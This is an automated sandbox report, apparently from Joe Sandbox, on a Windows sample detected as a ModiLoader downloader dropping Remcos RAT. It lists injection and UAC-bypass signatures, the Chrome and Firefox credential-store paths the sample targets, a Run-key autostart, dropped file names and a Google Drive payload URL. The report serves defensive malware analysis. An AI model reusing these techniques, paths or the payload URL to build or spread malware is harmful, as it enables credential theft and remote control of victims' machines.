                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: GetLocaleInfoA,0_2_02C9A810
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02C95BD8
                Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,7_2_00048572
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,7_2_00046854
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,7_2_00049310
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,11_2_03252393
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_03252143
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,11_2_0325201B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,11_2_032520B6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_03252690
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,11_2_032525C3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_032524BC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,11_2_03248484
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,11_2_0320F90C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,11_2_0324896D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,11_2_03251FD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,11_2_03251D58
                Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,15_2_00048572
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,15_2_00046854
                Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,15_2_00049310
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,21_2_02ED2393
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,21_2_02ED20B6
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,21_2_02ED201B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_02ED2143
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_02ED2690
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_02ED24BC
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,21_2_02EC8484
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,21_2_02ED25C3
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,21_2_02EC896D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,21_2_02E8F90C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,21_2_02ED1FD0
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_02ED1D58
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9920C GetLocalTime,0_2_02C9920C
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0321B69E GetUserNameW,11_2_0321B69E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032493E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_032493E5
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C9B78C GetVersionExA,0_2_02C9B78C
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.14.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.14.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                Source: Amcache.hve.14.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, Amcache.hve.14.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0320BA4D
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data21_2_02E8BA4D
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db11_2_0320BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\21_2_02E8BB6B
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db21_2_02E8BB6B

                Remote Access Functionality

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe11_2_0320569A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe21_2_02E8569A

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure1
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter                		1
                Valid Accounts                		1
                Bypass User Account Control                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol111
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Service Execution                		1
                Windows Service                		1
                Valid Accounts                		2
                Obfuscated Files or Information                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                Registry Run Keys / Startup Folder                		11
                Access Token Manipulation                		1
                Timestomp                		NTDS1
                System Network Connections Discovery                		Distributed Component Object ModelInput Capture113
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                Windows Service                		1
                DLL Side-Loading                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts321
                Process Injection                		1
                Bypass User Account Control                		Cached Domain Credentials44
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Registry Run Keys / Startup Folder                		1
                File Deletion                		DCSync241
                Security Software Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                Masquerading                		Proc Filesystem1
                Virtualization/Sandbox Evasion                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Valid Accounts                		/etc/passwd and /etc/shadow1
                Process Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Virtualization/Sandbox Evasion                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task321
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562863 Sample: nft438A5fN.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 65 drive.usercontent.google.com 2->65 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus / Scanner detection for submitted sample 2->83 85 10 other signatures 2->85 9 nft438A5fN.exe 1 6 2->9         started        14 Wuqtggvo.PIF 2->14         started        16 Wuqtggvo.PIF 2->16         started        signatures3 process4 dnsIp5 69 drive.usercontent.google.com 142.250.181.129, 443, 49705, 49706 GOOGLEUS United States 9->69 59 C:\Users\Public\Wuqtggvo.url, MS 9->59 dropped 61 C:\Users\Public\Libraries\ovggtquW.cmd, DOS 9->61 dropped 63 C:\Users\Public\Libraries\Wuqtggvo, OpenPGP 9->63 dropped 93 Early bird code injection technique detected 9->93 95 Allocates memory in foreign processes 9->95 97 Queues an APC in another process (thread injection) 9->97 99 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->99 18 colorcpl.exe 9->18         started        21 cmd.exe 1 9->21         started        23 esentutl.exe 2 9->23         started        101 Antivirus detection for dropped file 14->101 103 Multi AV Scanner detection for dropped file 14->103 105 Machine Learning detection for dropped file 14->105 26 colorcpl.exe 14->26         started        28 SndVol.exe 16->28         started        file6 signatures7 process8 file9 71 Contains functionality to bypass UAC (CMSTPLUA) 18->71 73 Contains functionalty to change the wallpaper 18->73 75 Contains functionality to steal Chrome passwords or cookies 18->75 77 3 other signatures 18->77 30 WerFault.exe 20 16 18->30         started        32 WerFault.exe 18->32         started        34 esentutl.exe 2 21->34         started        38 alpha.pif 1 21->38         started        40 esentutl.exe 2 21->40         started        44 6 other processes 21->44 57 C:\Users\Public\Libraries\Wuqtggvo.PIF, PE32 23->57 dropped 42 conhost.exe 23->42         started        46 2 other processes 26->46 48 2 other processes 28->48 signatures10 process11 file12 53 C:\Users\Public\alpha.pif, PE32 34->53 dropped 87 Drops PE files to the user root directory 34->87 89 Drops PE files with a suspicious file extension 34->89 91 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 34->91 50 xpha.pif 1 38->50         started        55 C:\Users\Public\xpha.pif, PE32 40->55 dropped signatures13 process14 dnsIp15 67 127.0.0.1 unknown unknown 50->67

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                nft438A5fN.exe58%ReversingLabsWin32.Downloader.ModiLoader
                nft438A5fN.exe68%VirustotalBrowse
                nft438A5fN.exe100%AviraTR/AD.Nekark.iteef
                nft438A5fN.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\Public\Libraries\Wuqtggvo.PIF100%AviraTR/AD.Nekark.iteef
                C:\Users\Public\Libraries\Wuqtggvo.PIF100%Joe Sandbox ML
                C:\Users\Public\Libraries\Wuqtggvo.PIF58%ReversingLabsWin32.Downloader.ModiLoader
                C:\Users\Public\Libraries\Wuqtggvo.PIF68%VirustotalBrowse
                C:\Users\Public\alpha.pif0%ReversingLabs
                C:\Users\Public\alpha.pif0%VirustotalBrowse
                C:\Users\Public\xpha.pif0%ReversingLabs
                C:\Users\Public\xpha.pif0%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.usercontent.google.com
                		142.250.181.129
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://drive.usercontent.google.com/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdifalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gpcolorcpl.exefalse
                        		high
                        https://drive.usercontent.google.com/downft438A5fN.exe, 00000000.00000002.1655641681.00000000396BD000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://sectigo.com/CPS0nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://ocsp.sectigo.com0nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://drive.usercontent.google.com:443/download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdiX?nft438A5fN.exe, 00000000.00000002.1611613314.0000000000884000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://geoplugin.net/json.gp/Cnft438A5fN.exe, 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://upx.sf.netAmcache.hve.14.drfalse
                                        		high
                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.pmail.comnft438A5fN.exe, nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.sectigo.com0Cnft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://drive.usercontent.google.com/tnft438A5fN.exe, 00000000.00000002.1611613314.000000000085B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.250.181.129
                                                		drive.usercontent.google.comUnited States
                                                		15169GOOGLEUSfalse

                                                Private

                                                IP
                                                127.0.0.1

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1562863
                                                Start date and time:2024-11-26 08:11:10 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 20s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:41
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:nft438A5fN.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617.exe
                                                Detection:MAL
                                                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 65
                                                • Number of non-executed functions: 195
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                02:12:12API Interceptor2x Sleep call for process: nft438A5fN.exe modified
                                                02:12:34API Interceptor2x Sleep call for process: Wuqtggvo.PIF modified
                                                02:12:38API Interceptor6x Sleep call for process: WerFault.exe modified
                                                08:12:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wuqtggvo C:\Users\Public\Wuqtggvo.url
                                                08:12:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wuqtggvo C:\Users\Public\Wuqtggvo.url

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                No context

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
